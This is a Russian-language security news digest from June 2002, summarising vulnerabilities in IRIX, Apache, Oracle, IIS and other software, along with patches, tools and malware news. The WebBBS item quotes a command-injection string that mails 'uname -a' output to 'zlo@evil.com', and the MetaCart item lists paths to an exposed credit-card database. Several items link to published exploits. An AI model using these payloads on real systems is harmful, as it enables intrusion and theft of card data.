Интересная статья на тему того, как бороться с убытками, которые может принести червь Nimda и ее аналоги. Описывается, как сделать так, чтобы наказание понес виновник распространения этого червя, при этом не затратив никакого траффика. Читать: http://www.phpdevs.com/data/22/60.html
21/06/2002 Уязвимость в IRIX xfsmd.
LSD (Last Stage of Delirium) Research Group обнаружила уязвимость в ОС IRIX. Она присутствует в RPC-сервисе rpc.xfsmd, который обеспечивает взаимодействие между XFS-файловой системой (журналируемая файловая система от SGI Inc.) и логическими дисками (xlv). Управляет запросами на создание, монтирование и размонтирование файловой системы, а также управляет параметрами файловой системы и всего раздела диска. В IRIX зарегистриован в RPC-сервисе с номером 391016. Недостатки в схеме аутентификации RPC-служб (AUTH_UNIX) и в реализации функции popen() позволяют удалённо получить доступ суперпользователя на машину с ОС IRIX и установленным ПО eoe.sw.xfsmserv. Сама фирма SGI пока не выпустила патч и рекомендует администраторам закомментировать строку в /etc/inetd.conf, запускающую xfsmd и удалить пакет eoe.sw.xfsmserv. Бюллетень по безопасности получил номер 20020605-01-I. Тем временем LSD выпустила эксплоит для этой уязвимости. Бюллетени по безопасности от SGI и патчи - http://www.sgi.com/support/security/ Рабочий эксплоит от LSD - http://www.lsd-pl.net/files/get?IRIX/irx_xfsmd
21/06/2002 DoS в Apache Tomcat.
Группа из Дании KPMG Обнаружила уязвимость в вэб-сервере Apache Tomcat 4.0.3 для Windows 2000 Server. Этот вэб-сервер поддерживается на сайте jakarta.apache.org. Если послать серверу большое количество нулевых символов, он перестанет отвечать на запросы. Инсталяция по умолчанию содержит 75 рабочих потоков-это значит, что для проведения атаки типа DoS достаточно послать подобные запросы 75 раз. Рекомендуют обновить сервер до версии 4.1.3 beta. Бета версия - http://jakarta.apache.org/builds/jakarta-tomcat-4.0/release/v4.1.3-beta/
21/06/2002 Уязвимость в Acrobat Reader 4.05 для Linux.
Jarno Huuskonen обнаружил ошибку в Acrobat Reader 4.05 для Linux, заключающуюся в некорректном создании (с неправильными системными полномочиями) при печати или просмотре PDF-документов, файлов в директории /tmp. Это даёт возможность проведения локальной атаки типа symlink attack с перезаписью этих временных файлов. В качестве исправления автор предлагает либо скачать Acrobat Reader 5.05 с сайта Adobe, либо выставить в качестве переменной TMP - ~/tmp (временную директорию в домашнем каталоге пользователя). Источник - http://www.securityfocus.com
21/06/2002 Уязвимость в Xitami Web Server.
Trippin Smurfs Security Team сообщает об обнаружении уязвимости в Xitami - маленьком и многопоточном вэб-сервере для ОС Winows. Заключается она в том, что этот сервер хранит в чистом (нешифрованном) виде пароли администратора и остальных пользователей. Для получения паролей локальному пользователю достаточно посмотреть содержимое файла defaults.aut в директории C:\Xitami. Уязвимость робнаружена в версии 2.5b4. Автор ( ace@microsoft.ph ) на обращение команды об уязвимости не ответил. Источник - http://www.t-smurfs.com/
21/06/2002 Кумулятивные патчи для Excel и Word.
19 июня Microsoft выпустила кумулятивный патч, который закрывает уязвимости, найденные в Word и Excel нашими российскими командами dH team и SECURITY.NNOV (небезызвестный ЗАРАЗА), а также Darryl Higa. Соответствующий информационны бюллетень от Microsoft носит название MS02-031. Закрывает 4 обнаруженные уязвимости (в терминологии Microsoft): Excel Inline Macros Vulnerability, Hyperlinked Excel Workbook Macro Bypass, Excel XSL Stylesheet Script Execution и Word Mail Merge Vulnerability. Подробное описание уязвимость и ссылку на патч можно увидеть в приводимой ниже ссылке. Бюллетень Microsoft - http://www.microsoft.com/technet/security/bulletin/MS02-031.asp Описание уязвимости в Word - выполнение кода через Mail Merge - http://www.security.nnov.ru/search/document.asp?docid=2892
21/06/2002 Новая версия много-функционального взломщика THC-Hydra.
В свет вышла версия 2.1 интересного брутфорсера THC-Hydra. Этот взломщик особен тем, что он умеет параллельно подбирать пароли от разных сервисов к хосту. THC-Hydra умеет обращаться с протоколами: FTP, POP3, IMAP, Telnet, HTTP Auth, NNTP, VNC, ICQ, Socks5, PCNFS, samba, LDAP, поддерживает SSL и проверяет хост на cisco enable. Теперь данную программу было решено включить и в новые релизы знаменитого сканера безопасности Nessus. Кстати, THC, в названии программы расшифровывается как The Hackers Choice, так называется команда, которая написала Hydra. Настоятельно рекомендуется посетить сайт The Hackers Choice, где вы найдете массу интересных инструментов, эксплоитов и публикаций. Сайт The Hackers Choice: http://www.thehackerschoice.com Скачать THC-Hydra: http://packetstorm.decepticons.org/groups/thc/hydra-2.1.tar.gz
20/06/2002 Rafale X - инструмент для формирования сетевых пакетов под Windows.
Представляем вашему вниманию инструмент формирования сетевых пакетов для платформы Windows. Вот его краткое описание: "Rafale X is a packet builder for Windows, this program is not using the network layer provided by the OS. Therefore, it allows to design any kind of packet letting you free to custom parameters which are usually set by the OS such as the source IP for instance". Рекомендуется для проверки файрволлов и прочих сетевых "забав". :) Комплектуется также следующими утилитами: DNS LookUp, Finger, HTTP Header, Whois. Также на сайте могут заинтересовать ссылки на проекты IDSCenter и PackX Tools. Сайт проекта - http://www.packx.net/packx/html/en/rafalex/index-rafalex.htm
20/06/2002 Переполнение буфера в UNIX VPN Client.
Обнаружена уязвимость в UNIX VPN Client от CISCO. Присутствует в версиях для ОС: Linux, Solaris, Mac OS X. Версия для Windows не подвержена уязвимости. Использование "дыры" позволяет локально получить права суперпользователя. CISCO выпустила обновлённую версию 3.5.2. При невозможности апгрейда рекомендуется выполнить команду chmod -s vpnclient (снятие SUID бита в правах файла). Тутже после объявления о б уязвимости некто methodic из AngryPacket security group опубликовал эксплоит. Подробности - http://www.cisco.com/warp/public/707/cisco-unix-vpnclient-buffer-overflow-pub.shtml Эксплоит - http://sec.angrypacket.com/exploits/vpnKILLient.c
20/06/2002 Уязвимость в Microsoft SQL Server 2000.
NGSSoftware в лице Дэвида Литчфильда опубликовала отчёт о нахождении уязвимости в Microsoft SQL Server 2000. Связана она с возможностью удалённого перезапуска (overrun) буфера в функции OpenDataSource, если она работает в связке с движком MS Jet Engine. Так как уязвимость связана с JET, то наличие подобной уязвимости возможно и в других продуктах. Сформировав определённый SQL-запрос, злоумышленник при использовании функции OpenDataSource может получить переполнение буфера с возможностью выполнения произвольного кода в контенте SYSTEM. Приводится пример скрипта под названием "SQL-ODSJET-BO" для использования этой уязвимости. Microsoft срочно выпустила новую версию движка JET И рекомендует всем загрузить его с сайта. Подробности - http://www.ngssoftware.com/advisories/mssql-ods.txt Новая версия JET - http://www.microsoft.com/windows2000/downloads/recommended/q282010/default.asp....
20/06/2002 Уязвимость в WebBBS.
Nerf gr0up из России обнаружила уязвимость в WebBBS v5.0 (возможно и в более старых версиях) - Web-ориентированном пакете для организации BBS-электронной доски объявлений. Скрипт, который обслуживает это приложение, позволяет выполнить команды на сервере без всякой фильтрации, что позволяет выполнить многие критичные команды. Уязвимость возникает из-за передачи функции open в качестве имени файла нефильтруемого пользовательского ввода. В письме в BUGTRAQ в качестве примера приводится вот такая команда: "followup=10;uname -a|mail zlo@evil.com|",что приведет к выполнению команд, содержащихся в параметре followup. Последствия очевидны. Авторы также в письме приводят исходник на Перл для использования этой уязвимости. Подробности - http://www.nerf.ru/index.php?i=txtp&j=adv07r Эксплоит - http://www.nerf.ru/_files/websxpl.pl
20/06/2002 Статья по SQL injection.
Крис Энли из NGGSOFTWARE выложил в Интернет статью о методах и способах SQL injection-методе формирования SQL-запросов для извлечения информации из базы данных. Статья доступна в PDF-формате. Статья - http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf
20/06/2002 Уязвимость в MetaCart.
В MetaCart2.sql - ASP-приложении для обслуживания клиентов посредством кредитных карточек с поддержкой SQL-запросов - обнаружена уязвимость, используя которую, злоумышленник может получить доступ к базе данных кредитных карточек и узнать подробную информацию о владельцах кредиток (Credit cart numbers, Names, Surnames, Addresses, E-mails, etc). Для этого достаточно сформировать запросы вида: http://xxxshop/database/metacart.mdb, http://xxxshop/metacart/database/metacart.mdb. Источник - http://www.securityfocus.com
20/06/2002 Уязвимость в роутерах ZyXEL Prestige.
Ueli Kistler обнаружил уязвимость в роутерах ZyXEL Prestige 642R-11 AJ.6. Заключается она в том, что если на этот роутер подать пакет с установленными TCP-флагами ACK и SYN, службы telnet, ftp и DHCP перестают функционировать и недоступны даже напрямую через RS-232. Установка флагов SYN и FIN Приводит к остановке сервисов на несколько минут. Источник - http://www.securityfocus.com
20/06/2002 Уязвимость в Apache.
Cпециалист по безопасности из nggsoftware Дэвид Литчфильд и ISS независимо друг от друга обнаружили уязвимость в популярном Вэб-сервере apache. Заключается она в некорректной обработке так называемых chunked encoding запросов (режим http 1.1, позволяющий отправлять данные не одним потоком, а несколькими блоками, и именно при сборке этих блоков случилась ошибка). Она приводит к аварийному завершению потока или процесса (в зависимости от платформы), обрабатывающего запрос.Как минимум это может привести к DoS-атаке (например, поток подобных запросов через некоторое время заставит сервер полностью переключиться на увлекательную работу по запуску новых дочерних процессов). Вчера CERT выпустил информационный бюллетень по безопасности с номером CA-2002-17 под названием "Apache Web Server Chunk Handling Vulnerability". Уязвимость присутствует в версиях Apache 1.3-1.3.24 и 2.0-2.0.36 приводит к возможности выполнения удалённого кода в контенте SYSTEM на Windows платформах. Также, по сообщениям Apache Software Foundation, возможность выполнения кода присутствует на 64-разрядных платформах UNIX. Администраторам рекомендуется обновитьсф на недавно выпущенные Apache Software Foundation версии 1.3.26 или 2.0.39. В Интернете появились исходники для эксплуатации этой уязвимости. Информационный бюллетень CERT - http://www.cert.org/advisories/CA-2002-17.html
19/06/2002 Годовщина выпуска первого жёсткого диска.
Хоть новость и не относится к безопасности, но всё же достойна места в наших новостях. 19 июня 1956 г. фирма IBM выпустила первый накопитель на жёстком диске (тогда ещё не получившем название "винчестер") под названием RAMAC-350. Представлял собой устройство размером с 2 холодильника и стоил более 50К долларов. Носителем в нём служили пятьдесят (!) дисковых пластин диаметром 24 дюйма (61 см.). Характеристики первого "винта" впечатляют: ёмкость-5 мегабайт, скорость вращения-1200 об/мин, среднее время доступа - 1с, поверхностная плотность-2 кБит/дюйм. Источник- Журнал "Upgrade"
17/06/2002 Ошибка разбора таблиц CSS в Internet Explorer.
Как пишет в письме BUGTRAQ Дмитрий Леонов (основатель и хозяин самого известного портала по безопасности www.bugtraq.ru), Олегом Черемисиным была обнаружена уязвимость в популярном броузере Internet Explorer версий 5/5.5 (Win98) и 6.0 (WinXP), а также приложениях, использующих движок IE (Outlook Expres). Состоит она в неправильном разборе HTML-страниц, содержащих специальным образом оформленных CSS-таблиц. При разборе элемента p{cssText: font-weight:bold;} броузер "рушится". Хотя это и не приводит к переполнению буфера, однако может способствовать проведению атаки типа DoS. Описание - http://www.bugtraq.ru/rsn/archive/2002/06/22.html Демонстрация эксплоита - http://www.bugtraq.ru/rsn/archive/2002/06/.keep/.msiecrash.html
17/06/2002 TOORCON COMPUTER SECURITY CONFERENCE 2002.
27-29 сентября 2002 в гостинице Bristol в г. Сан-Диего (штат Калифорния) состоится конференция по компьютерной безопасности ToorCon. Объявлен приём докладов для участия в конференции. Самым примечательным, что выделяет эту конференции от остальных является организация онлайнового соревнования по взлому/защите под названием RootWars, где обе стороны могут попробовать свои силы. Ссылка для заинтересованных - http://www.toorcon.org
17/06/2002 DoS в Microsoft FrontPage 98 и Netscape Composer.
Infobyte Security Research из Аргентины обнаружила уязвимость в Microsoft FrontPage 98 и Netscape Composer (проверялась версия 4.77 в Slackware 8.0) - инструментах для создания и редактирования Вэб-страниц. Первая уязвимость связана с ошибкой дизайна, вторая с возможностью переполнения буфера. Обе связаны с некорректной обработкой тега <font face= >. Если в это поле подставить пустое значение " ", то оба пакета "упадут". Если же задать значение, состоящее из символов больше 197, у Composer произойдёт переполнение буфера. Подробности - http://mal0r.no-ip.org/advisories/frontpagevscomposer.txt
17/06/2002 Сниффер для Microsoft MSN Messenger. Явлается ли он "бэкдором"?.
Seunghyun Seo из Кореи анонсировал сниффер (перехватчик пакетов) для перехвата пакетов, формируемых при общении посредством Microsoft MSN Messenger. Название его довольно красноречиво - msn666. По словам автора, сниффер анализирует msn message-протокол для каждого перехваченного пакета и выводит его содержимое на экран. Стоит заметить, что сразу же после анонса группа GOBBLES написала, что данный продукт является "бэкдором", который настраивает сервер на порт 1863 (приводился пример исходного кода). В результате длительной дискуссии с автором был опубликован эксплоит для версии 1.0.0 (GOBBLES-own-msn666), на что автор тут же выпустил версию 1.0.1. Автор утверждает, что его программа не содержит никаких "бэкдоров". В ответ GOOBLES продолжает утверждать о наличии ошибки в программном коде продукта. Похоже, точка в дискуссии пока не поставлена. Для заинтересованых ссылка на исходник приведена ниже. MSN666 - http://underground.or.kr/project/msn666/
17/06/2002 Sony заявила об обнаружении дефекта в почтовой программе .
Компания Sony заявила, что обнаружила дефект в системе защиты почтовой программы PostPet. Примерно 90 млн. пользователей программного обеспечения могут пострадать от этого дефекта, заявил Хироюки Уено (Hiroyuki Ueno), пресс-секретарь интернет-подразделения Sony. Подробности: http://www.cnews.ru/news/comp/2002/06/14/20020614134025.shtml
17/06/2002 Microsoft – случайно распространила вирус.
В пятницу Microsoft признала, что случайно отправила разработчикам в Южную Корею версию Visual Studio .Net на корейском языке, зараженную опасным червем Nimda. По словам главного продакт-менеджера Visual Studio .Net. Кристофера Флореса (Christopher Flores), флагманский инструментарий для разработчиков Microsoft подцепил цифрового вредителя, когда третья компания переводила программу на корейский язык. Флорес утверждает, что ни одна другая локализованная версия программы не содержит червя, и ни на одной системе разработчиков червь не активизирован. «Случаев реального заражения не зарегистрировано», – сказал Флорес. На самом деле, добавил он, практически невероятно, чтобы червь активизировался на компьютерах с установленным Visual Studio .Net. Подробности: http://zdnet.ru/?ID=203781
17/06/2002 Взломана система заказа билетов на матчи Чемпионата мира по футболу.
Японским хакерам-спекулянтам удалось взломать защиту телефонной системы заказа билетов на футбольные матчи. В результате спекулянты в обход центра обработки звонков получили прямой доступ к телефонам операторов, продающих билеты. По признанию одного из спекулянтов, ему удалось приобрести таким способом 20 билетов на матчи с участием Японии и продать их по 150 тыс. иен (около 1200 долл.) каждый. Подробности: http://www.compulenta.ru/2002/6/15/30947/
14/06/2002 У нас новая программа: PE Tools.
Программа позволяет посмотреть и отредактировать: DOS-совместимый заголовок (форматированная часть), PE заголовок, и параметры секций (сегментов) в файле. Программа обрабатывает DOS 2 Header, PE Header, Object Table полностью. В главном окне программы можно изменять параметры DOS-совместимого заголовка. PE Header Editor производит изменения основных параметров PE-заголовка: точка входа, размер кода, базовый адрес, выравнивание PE заголовка, и др. Sections Editor производит изменения параметров секций: виртуалный адрес, виртуальный размер, физический адрес, физический размер, характеристки. Directory Editor изменяет параметры различных таблиц. Advanced Editor позволяет изменить различные версии (например версию линкера), тип подсистемы необходимой для запуска программы и др. Исходники прилагаются. Скачать здесь: http://www.uinc.ru/scripts/load.cgi?files/neox/PE_Tools.zip
14/06/2002 Появился вирус, заражающий файлы формата JPEG.
Вирусу было дано название "W32/Perrun". Он попадает на компьютер обычным путем - при запуске файла, в котором содержится его код. В текущем каталоге создается файл EXTRK.EXE и в регистр Windows добавляется запись "HKEY_CLASSES_ROOT\jpegfile\shell\open\command "(Default)" = (current directory)\EXTRK.EXE %1". Таким образом, Perrun запускается всякий раз при открытии jpg-файлов. Вирус не может самостоятельно распространяться на другие компьютеры. Симптомами заражения является модификация регистра и увеличение размера файлов .jpg (на 11780 байт). Специалисты Anti-Virus Response Team (AVERT) считают, что хотя Perrun мало опасен, он может привести к появлению новых, более сложных вирусов, использующих для переноса неисполняемые файлы. Источник: http://www.compulenta.ru/2002/6/14/30873/
14/06/2002 Кража цифровых удостоверений: очередной бум в отрасли?.
По мере роста популярности электронного бизнеса онлайновое мошенничество будет развиваться в направлении от кражи номеров кредитных карт к заимствованию корпоративных цифровых удостоверений личности, оставляя глубокие следы на финансовых показателях компании и настроении ее сотрудников. Корпоративные ID воруют, чтобы получить возможность приобретать товары за счет компании или заниматься промышленным саботажем. При этом компания-жертва может оказаться вовлеченной в преступную деятельность или утратить конкурентоспособность. Подробности: http://www.zdnet.ru/?ID=203675
14/06/2002 Разведывательную аэросъемку НАТО можно смотреть по телевизору.
Английский инженер Джон Локер, работающий в области спутникового вещания, обнаружил, что разведданные, собираемые силами НАТО в Югославии, находятся в открытом доступе и могут быть получены с помощью обычной спутниковой антенны. Статья о всеобщей доступности данных американской разведки была недавно опубликована на Международном сайте журналистских расследований. (www.icij.org) и в майском номере журнала What Satellite TV. На том же сайте можно посмотреть некоторые из видеозаписей воздушной разведки. Источник: http://www.compulenta.ru/2002/6/14/30868/
13/06/2002 Возможность DoS в pop3-клиенте.
Как утверждает eldre8 из Франции, им обнаружена возможность проведения DoS-атаки против pop3-клиентов, которые присутствуют в броузерах Netscape (версия ниже 4.77) и Mozilla (версия ниже 1.1). В Outlook Express 4.72.3110.5 подобной уязвимости нет. Связана уязвимость с особенностями разбора почты pop3-клиентом. При отправке почты через SMTP протокол отправка почты заканчивается "точкой" в пустой строке. С другой стороны pop3-клиент при приёме почты и обнаружении точки прерывает приём почты. Автор предположил, что если поставить точку в письме, а затем напечатать несколько слов, pop3-клиент прервёт приём почты, что может привести к десинхронизации между POP3-клиентом и сервером (из-за особенностей взаимодействия между ними). Таким образом можно заблокировать почтовый ящик пользователя, который для удаления "плохого" почтового сообщения будет вынужден входить на сервер "вручную" (telnet pop-server 110) и также вручную удалять это сообщение. В письме содержится исходный текст эксплоита этой уязвимости. Более подробно - http://afturgurluk.org/~eldre8/files/pop3client_dos.text
13/06/2002 Удалённый DoS в X-Window.
Обнаружен удалённый DoS в X-Window-оконной системе для *nix. Удалённый DoS возможен при просмотре CSS (Cascading Style Sheets) с заданными очень большими шрифтами (body { font-size: 1666666px; }) в броузере Mozilla. Об уязвимости сначала сообщил Tom Vogt c Lemuria.org, как об уязвимости Mozilla, приводящей к падению X-сервера. Однако из завязавшейся в BUGTRAQ дискуссии выяснилось, что сам броузер применяется только в качестве "инструмента", а сама уязвимость присутствует в X-Window при обработке шрифтов. При задании очень большого размера шрифта в Mozilla 0.9.4 c XFree86 4.2.0 наблюдалось через 3 секунды полное зависание машины с невозможностью "убить" X или перезапустить с клавиатуры. Подобная уязвимость не зависит от X-сервера и присутствует в реализациях X-Window на многих платформах (в частности, тестировались Linux и Solaris). То же самое наблюдается в подобной ситуации и с GIMP, однако в этом случае речь об удалённой атаке не идёт. Статья автора об уязвимости в Mozilla 1.0 - http://web.lemuria.org/security/mozilla-dos.html Полное описание - http://theregister.co.uk/content/55/25689.html
13/06/2002 Mozilla 1.1alpha.
Вышла альфа версия Mozilla 1.1, в которую вошли различные задержанные до релиза 1.0 изменения. В эту версию вошел Download Manager, улучшена скорость отрисовки страниц, улучшен Drag&Drop, и другие изменения. Так же следует отметить возможность блокировки загрузки изображений в почтовом клиенте. Подробности - http://www.mozilla.org/releases/mozilla1.1a/
13/06/2002 Уязвимости в Oracle.
NGSSoftware сообщила вчера о нахождении уязвимостей в продуктах Oracle. Первая уязвимость связана с Oracle Net Listener (висит на порту 1521/TCP) и позволяет атакующему, посредством удалённого перезапуска буфера (buffer overrun), получить полный контроль над машиной с запущеным сервером баз данных Oracle 9i. Oracle выпущен патч с номером 2367681. Вторая уязвимость присутствует в Oracle 9iAS Reports Server. Послав очень длинный параметр имени базы данных CGI-программе rwcgi60 с методом setauth, атакующий может переписать сохранённый в стеке адрес возврата и получить полный контроль над выполняющимиси процессами. Любой код, запущенный атакующим в этом случае будет выполняться в контексте безопасности пользователя, от которого запущен Вэб-сервер (в UNIX-ограниченные полномочия, однако в Windows c полномочиями SYSTEM). Oracle выпущен патч 2356680. Описание первой уязвимости - http://www.ngssoftware.com/advisories/oratns.txt Описание второй уязвимости - http://www.ngssoftware.com/advisories/orarep.txt
13/06/2002 Удалённое переполнение буфера в IIS-сервере.
eEye Digital Security в процессе работы над новой версией SecureIIS (файрволл приложений для Internet Information Services-вэб-сервера от Microsoft) обннаружила очередную уязвимость в версиях 4.0 (для NT) и 5.0 (Win2K) типа переполнения буфера. Уязвимость в transfer chunking в сочетании с обработкой HTR-запроса может быть применена атакующим для выполнения кода в памяти. Послав специально офрмленный запрос атакующий может переписать секцию кучи (heap). eEye Digital Security предупреждает всех администраторов о необходимости скорейшего применения патча от Microsoft, либо применять SecureIIS, выпускаемый этой командой. Кроме применения патча рекомендуется также отключить .htr ISAPI - фильтр. Детальное техническое описание - http://www.eeye.com/html/Research/Advisories/AD20020612.html Патчи от Майкрософт - http://www.microsoft.com/technet/security/
13/06/2002 Интересный документ по борьбе со спамом.
Очень полезная статья о методах и способах борьбы со спамом на сайте mail-abuse.org. Расписано как, кому и на кого следует писать комплейны. Подробно написано как включить релей в RBL. Собственно она и лежит на сайте создателя RBL Поля Викси. Вполне может претендовать на FAQ по спаму. Статья - http://mail-abuse.org/rbl/notifyfaq.html
12/06/2002 Определяется судьба домена *.su.
Как известно, в январе 2002 года компания РегТайм, являющаяся официальным регистратором доменов в зоне *.su приостановил регистрацию доменных имен в этой зоне в соответствии с решением «Фонда Развития Интернет». Это решение было принято по просьбе Министерства связи и информатизации. 7 июня компания РегТайм открывает на своем портале WebNames.Ru открывает голосование, цель которого – определить мнение аудитории портала относительно популярности доменной зоны *.su и приглашает интернет сообщество принять активное участие в голосовании. Подробности: http://webplanet.ru/article/1029.html
12/06/2002 Старый код в Windows — угроза безопасности.
Microsoft раньше, чем планировалось, очистит Windows от старого кода — чтобы избавиться от багов, прятавшихся там многие годы. После четырех месяцев реализации инициативы trustworthy computing Microsoft решила ускорить процесс удаления старого кода из Windows и других продуктов, сказал в своем интервью главный в компании охотник за клопами. Подробности: http://zdnet.ru/?ID=203502
12/06/2002 IBM получила плотность записи в 125 Гбайт на дюйм.
Ученые IBM сделали еще один значительный шаг в применении нанотехнологий для хранения данных - им удалось добиться плотности записи в 1 терабит на квадратный дюйм (6,25 кв.см). Подробности: http://www.compulenta.ru/2002/6/11/30799/
12/06/2002 Устройство для обнаружения сотовых телефонов.
Молодая израильская компания Netline разработало устройство, которое позволяет быстро выявлять работающие мобильные телефоны-шпионы. Подробности: http://www.compulenta.ru/2002/6/12/30800/
10/06/2002 DivX на Xbox. О чем не знали в Microsoft.
Некто, под ником d7o3g4q, умудрился обезвредить защиту приставки xBox от запуска "неофициального" программного обеспечения. Более того, он подготовил первую версию модифицированного кодека DivX, которая сможет проигрывать DivX фильмы на приставке xBox. Защиту удалось снять, как путем замены компонентов xBox'а, так и программным способом. Подробности: http://www.compulenta.ru/2002/6/10/30723/
10/06/2002 Историю спасли хакеры.
9 лет назад в Норвегии начали формировать базу данных с историческими документами. Однако, в результате смерти сотрудника, работавшего с ней, доступ к данным оказался заблокированным из-за незнания пароля. Администрации не осталось ничего, кроме как выложить зашифрованные данные в интернет и попросить помощи у сетевого сообщества. И помощь не заставила себя долго ждать - первое же полученное письмо содержало пароль и расшифрованные файлы базы данных. Становится интересно, что же это была за защита, если ее так быстро и оперативно вскрыли? Источник: http://www.bugtraq.ru/rsn/archive/2002/06/9.html
9/06/2002 Уязвимости в Seanox DevWex.
В Seanox DevWex (небольшой и гибкий по настройкам Web-сервер для платформы Win32, выпускаемы и поддерживаемый немецкой фирмой Seanox) обнаружены уязвимости, которые поволяют как проводить атаку типа DoS, так и получать доступ к любому файлу на Web-сервере. Первая из них связана с некорректной обработкой запроса GET (запрос GET длиной 258383 символов приводит к неработоспособности сервера и даже, иногда, к возможности выполнения произвольного кода). Вторая уязвимость связана с тем, что если сформировать запрос с разделителем полей в стиле Windows ("обратный слэш" - \), можно получить доступ к любому файлу сервера. Производитель выпустил новую версию DevWex - 1.2002.0601. Новая версия и описание (на немецком языке) - http://www.seanox.de/projects.devwex.php4
9/06/2002 Уязвимость в W-Agora и LokwaBB.
В программах для Вэб-форумов W-Agora и LokwaBB обнаружены уязвимости, повзоляющие в версии W-Agora 4.1.3 включать собственные файлы (атака типа XSS), в версии LokwaBB 1.2.2 выполнять атаки типа XSS, читать частные (приватные) сообщения и внедрять SQL. Подробное описание доступно на французском языке, а также в качестве перевода с сервера google.com Описание уязвимости W-Agora - http://translate.google.com/translate?... Описание уязвимости LockwaBB - http://translate.google.com/translate?...
9/06/2002 Вышли новые релизы Bugzilla.
8 июня Dave Miller, лидер проекта Bugzilla (проект, которые позволяет отслеживать ошибки в программном обеспечении и обновления ПО, был написан Dave Miller на языке TCL и позже портирован на Perl), анонсировал выход двух новых версий этого ПО-2.14.2 и второй релиз-кандидат версии 2.16 - 2.16rc2. Как указывает Дэйв в новых версиях устранены различные баги предыдущих версий, в том числе связанные с безопасностью. Количество устранённых багов довольно впечатляюще и достигает десяти багов. Чтобы не расписывать каждый из них-укажем только номера, заинтересованные могут посмотреть их описания, введя вместо XXX номер бага. Итак, список багов: 126801, 129466, 134575, 141557, 146447, 147486, 107718, 148674, 92263, 130821. Новые версии доступны для скачивания как в полном объёме, так и виде патчей к предыдущим версиям (патч к версиям 2.14, 2.14.1 для апгрейда до 2.14.2). Описания багов - http://bugzilla.mozilla.org/show_bug.cgi?id=XXXXX Директория даунлоадов полных версий - http://www.bugzilla.org/download.html
9/06/2002 Почтовый сервис Hotmail станет платным.
Компания Microsoft решила ввести плату за пользование некоторыми услугами принадлежащей ей почтовой интернет-службе Hotmail. С 16 июля для желающих получать сообщения с серверов, поддерживающих протокол РОР3, на свой старый почтовый ящик будет предлагается услуга MSN Extra Storage. Подписка на нее в Великобритании обойдется в 19,95 фунтов за год. Оплатившим эту услугу предоставят почтовый ящик емкостью десять мегабайт. Источник - http://lenta.ru/internet/2002/06/09/hotmail/
9/06/2002 Неофициальный патч для Pine 4.44.
Pine - это почтовый клиент (MUA), входящий в дистрибутив многих *NIX-систем. Этот клиент позволяет указывать в поле "From:" имя пользователя, отличное от UID, под которым пользователь зарегистрирован в системе. Однако, как указывает Roger Marquis, системный консультант из компании Roble, при дальнейшей пересылке почты в служебных полях MUA Pine "Sender:" и/или "X-Sender:" указывается истинный UID пользователя. На сервере производителя Pine (Вашингтонский университет) размещён патч для версии 4.44. Патч был проверен на ОС Solaris и FreeBSD. Процедура установки стандартная. Распаковать архивный файл в директорию исходников (tar zxvf ...) и применить команду patch < patch_file_name, после чего перекомпилировать исходники в соответствии с документацией. Другие детали об изменении поля From: - http://www.washington.edu/pine/faq/config.html#9.5 Cкачать патч - ftp://ftp.cac.washington.edu/pine/
9/06/2002 A Buffer Overflow Study - Attacks & Defenses.
Отчет, написанный двумя студентами Французской национальной школы инженеров, содержит наилучшее описание проблемы Buffer Overflow. Большое количество примеров, подробное описание механизма и много другое, расположенное всего на 102 страницах этого отчета. Читать документ здесь: http://www.enseirb.fr/~glaume/bof/report.pdf
8/06/2002 Злоупотребления тематикой футбольного чемпионата.
В сети появилась первая вредоносная программа, использующая для своего распространения тематику футбольного чемпионата. Несмотря на популярную тему заголовка, сетевой червь Brit.G, также известный как Chick.F, не грозит стать причиной новой вирусной эпидемии в Интернете. Оригинальная версия Интернет-червя Brit представляет собой простой вирус-червь, распространяющийся по электронной почте и каналам IRC в виде прикрепленного CHM- файла "BRITNEY.CHM". Для запуска вируса пользователю необходимо самостоятельно открыть вложенный файл, после чего червь заражает компьютер и рассылает свою копию лишь по первому адресу адресной книги MS Outlook. На сегодняшний день "Лаборатории Касперского" известны шесть разновидностей данной вредоносной программы - b, c, d, e, f, g, - отличающихся заголовками и названиями файлов вложений. Автор последней версии Интернет-червя, "Brit.g", попытался привлечь внимание пользователей, использовав в качестве приманки самую популярную тему последних дней - мировой чемпионат по футболу: тема письма RE: Korea Japan Results название вложенного файла KOREAJAPAN.CHM. Однако из-за ряда технических ошибок вероятность распространения данного червя "в диком виде" практически равна нулю. Источник - http://www.viruslist.com/index.html?tnews=1008&id=311345
8/06/2002 Сайты ВМФ США снова подверглись хакерской атаке.
Хакерская группа Infidelz продолжила дело раскрытого властями дуэта взломщиков Deceptive Duo. В четверг сайт Vnunet.com сообщил о взломе сайта tracker.hroc.navy.mil, находящегося в ведении Военно-морского флота США. По заверениям самих хакеров, направившим письмо журналистам Vnunet.com, им удалось получить доступ к закрытым персональным данным кандидатов на службу в ВМФ США. Впрочем, мотивация участников Infidelz несколько отлична от мотивов Deceptive Duo. Если последние настаивали на том, что взламывая сайты правительственных ведомств, они привлекают внимание к недостаточному обеспечению безопасности США, то Infidelz являются поклонниками ОС FreeBSD, которая, по их мнению, устойчива к такого рода атакам. Подробности - http://www.vnunet.com/News/1132407
8/06/2002 Древнее ПО наименее уязвимо перед хакерскими атаками.
На сайте NewsForge опубликована любопытная статья, в которой утверждается, что лучшим способом защитить сервер от хакерских атак является установка и использование морально устаревшего программного обеспечения. В качестве доказательства приводятся следующие доводы: уязвимости древней операционной системы и другого ПО попросту неизвестны среди хакеров, большая часть которых в момент появления данного ПО "пешком под стол ходила". Такое предположение было сделано Брайаном Акером, программистом сети сайтов OSDN, в которую входят порталы NewsForge, SlashDot и другие. "Один из моих компьютеров работает под управлением настолько старой версии Solaris, что большинство юных взломщиков даже не могут определить, с чем имеют дело", - говорит Брайан. "Хакеры изучают все самое новое и не имеют понятия о том, что делать с моей древнющей системой". К тому же, как заявляет Брайан, многих уязвимостей в старых системах нет просто потому, что нет соответствующих возможностей. Подробности - http://newsforge.com/newsforge/02/06/05/1228236.shtml?tid=2
8/06/2002 Первые впечатления от Windows XP Service Pack 1.
